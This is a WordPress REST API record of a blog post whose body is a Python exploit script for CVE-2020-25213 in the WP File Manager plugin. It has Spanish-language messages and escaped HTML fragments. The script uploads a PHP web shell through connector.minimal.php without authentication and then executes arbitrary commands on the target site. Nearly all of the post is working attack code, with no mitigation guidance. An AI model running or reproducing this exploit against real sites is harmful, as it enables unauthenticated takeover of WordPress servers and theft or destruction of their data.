#!\/usr\/bin\/env<\/p>\n
# Exploit Title: WP-file-manager v6.9 – Unauthenticated Arbitrary File Upload leading to RCE
\n# Date: [ 22-01-2023 ]\n# Exploit Author: [BLY]\n# Vendor Homepage: [https:\/\/wpscan.com\/vulnerability\/10389]\n# Version: [ File Manager plugin 6.0-6.9]\n# Tested on: [ Debian ]\n# CVE : [ CVE-2020-25213 ]\n
import sys,signal,time,requests
\nfrom bs4 import BeautifulSoup
\n#from pprint import pprint<\/p>\n
def handler(sig,frame):
\nprint (“[!]Saliendo”)
\nsys.exit(1)<\/p>\n
signal.signal(signal.SIGINT,handler)<\/p>\n
def commandexec(command):<\/p>\n
exec_url = url+”\/wp-content\/plugins\/wp-file-manager\/lib\/php\/..\/files\/shell.php”
\nparams = {
\n“cmd”:command
\n}<\/p>\n
r=requests.get(exec_url,params=params)<\/p>\n
soup = BeautifulSoup(r.text, ‘html.parser’)
\ntext = soup.get_text()<\/p>\n
print (text)
\ndef exploit():<\/p>\n
global url<\/p>\n
url = sys.argv[1]\ncommand = sys.argv[2]\nupload_url = url+”\/wp-content\/plugins\/wp-file-manager\/lib\/php\/connector.minimal.php”<\/p>\n
headers = {
\n‘content-type’: “multipart\/form-data; boundary=—-WebKitFormBoundaryvToPIGAB0m9SB1Ww”,
\n‘Connection’: “close”
\n}<\/p>\n
payload = “——WebKitFormBoundaryvToPIGAB0m9SB1Ww\\r\\nContent-Disposition: form-data; name=\\”cmd\\”\\r\\n\\r\\nupload\\r\\n——WebKitFormBoundaryvToPIGAB0m9SB1Ww\\r\\nContent-Disposition: form-data; name=\\”target\\”\\r\\n\\r\\nl1_Lw\\r\\n——WebKitFormBoundaryvToPIGAB0m9SB1Ww\\r\\nContent-Disposition: form-data; name=\\”upload[]\\”; filename=\\”shell.php\\”\\r\\nContent-Type: application\/x-php\\r\\n\\r\\n<?php echo \\”<pre>\\” . shell_exec($_REQUEST[‘cmd’]) . \\”<\/pre>\\”; ?>\\r\\n——WebKitFormBoundaryvToPIGAB0m9SB1Ww–”<\/p>\n
try:
\nr=requests.post(upload_url,data=payload,headers=headers)
\n#pprint(r.json())
\ncommandexec(command)
\nexcept:
\nprint(“[!] Algo ha salido mal…”)<\/p>\n
def help():<\/p>\n
print (“\\n[*] Uso: python3″,sys.argv[0],”\\”url\\” \\”comando\\””)
\nprint (“[!] Ejemplo: python3″,sys.argv[0],”http:\/\/wordpress.local\/ id”)<\/p>\n
if __name__ == ‘__main__’:<\/p>\n
if len(sys.argv) != 3:
\nhelp()<\/p>\n
else:
\nexploit()<\/p>\n","protected":false},"excerpt":{"rendered":"
#!\/usr\/bin\/env # Exploit Title: WP-file-manager v6.9 – Unauthenticated Arbitrary File Upload leading to RCE # Date: [ 22-01-2023 ] # Exploit Author: [BLY] # Vendor Homepage: [https:\/\/wpscan.com\/vulnerability\/10389] # Version: [ File Manager plugin 6.0-6.9] # Tested on: [ Debian ] # CVE : [ CVE-2020-25213 ] import sys,signal,time,requests from bs4 import BeautifulSoup #from pprint import …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-39902","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/39902","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=39902"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/39902\/revisions"}],"predecessor-version":[{"id":40194,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/39902\/revisions\/40194"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=39902"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=39902"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=39902"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}